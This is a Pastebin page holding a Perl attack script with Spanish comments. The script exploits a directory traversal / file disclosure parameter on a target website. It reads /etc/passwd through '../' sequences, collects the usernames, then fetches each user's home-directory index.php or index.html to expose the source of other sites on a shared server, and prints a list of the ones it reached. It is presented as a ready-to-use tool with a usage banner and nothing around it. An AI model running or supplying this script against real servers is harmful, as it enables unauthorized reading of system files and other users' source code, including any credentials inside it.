Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- use HTTP::Request;
- use LWP::UserAgent;
- my $browser = LWP::UserAgent->new();
- sub banner {
- print "
- _ _ _
- |_ \/|_)|_| _ _ o __ (_| |_|/ \ _ _|_
- |_) / | |_> _> | | |__| | |\_/_> |_
- C o d e d by b 4 n z 0 k
- * Modo de Uso :
- * perl script.pl [Web] [Carpeta_web] [path_destino(Opcional)]\n
- *\tperl script.pl www.web.com/archivo.php?disclosure= htdocs
- ";
- }
- $url = $ARGV[0]; # print "$vuln\n";
- unless ($url) { &banner; }
- $home = $ARGV[1]; # print "$home\n";
- $dr = "home/"; #Esta Parte La deves de cambiar Manualmente dependiendo la informacion de "/etc/passwd"
- $pt = "../../../../";
- #$pt = "....//....//....//....//....//....//....//....//....//";
- $bp = "";
- @usuarios;
- @vulnerados;
- $archivo = $ARGV[2];
- unless ($ARGV[2]) {
- $archivo1 = "/index.php";
- $archivo2 = "/index.html";
- }
- $url = "http://" . $url if $url !~ m/^http\:\/\//;
- if ($url =~ m/^http\:\/\/([a-zA-Z0-9-.]+)\/(.*)/)
- { $host = $1; $path0 = $2; }
- $path = $url . $path. $pt . $pt . $pt . "etc/passwd" . $bp;
- print "$path\n";
- my $request = $browser->get($path);
- my $content = $request->content;
- #print "$content\n";
- if ($content =~ m/(.*):x:(.*):(.*):(.*):\/bin/g) {
- while ($content =~ m/(.*):x:(.*):(.*):(.*):\/bin/g )
- { #print $1 . "\n";
- push (@usuarios,$1); # Esto tambien puede cambiar el $1
- } } else { print "\n[*] Error En la Injeccion.\n\n"; exit; }
- &banner;
- print "\n\n[*] # Ju4ck34ndo [ Server * $host ] d3sd3 d3ntr0 #\t[*]\n\n";
- foreach $n (@usuarios) {
- $path2 = $url . $pt . $pt . $pt . $bp . $pt . $pt . $pt . $dr . $n . "/" . $home;
- # print "$path2\n";
- unless ($ARGV[2]) {
- $path_g=$path2 . "/index.php";
- &requestt($path_g);
- $path_g=$path2 . "/index.html";
- &requestt;
- }
- if ($ARGV[2]) {
- $path_g = $path2 . $archivo;
- &requestt($path_g); }
- }
- sub requestt {
- my $request2 = $browser->get($path_g);
- my $content2 = $request2->content;
- # print "$content2\n"; m/failed to open stream/
- if ($content2 =~ m/\$(.*)/)
- {
- print "[#- pl0p -#]\t\ลง# - [ $n ] - #\n";
- push (@vulnerados,$path_g);
- }
- # else { print "# 3Rr0r # [$n]\t$path_g\n"; }
- }
- print "\n\n\t[ # - Webs Con Bypass de Permisos - # ]\n\n";
- foreach $n (@vulnerados)
- {
- print "[*] $n\n\n";
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement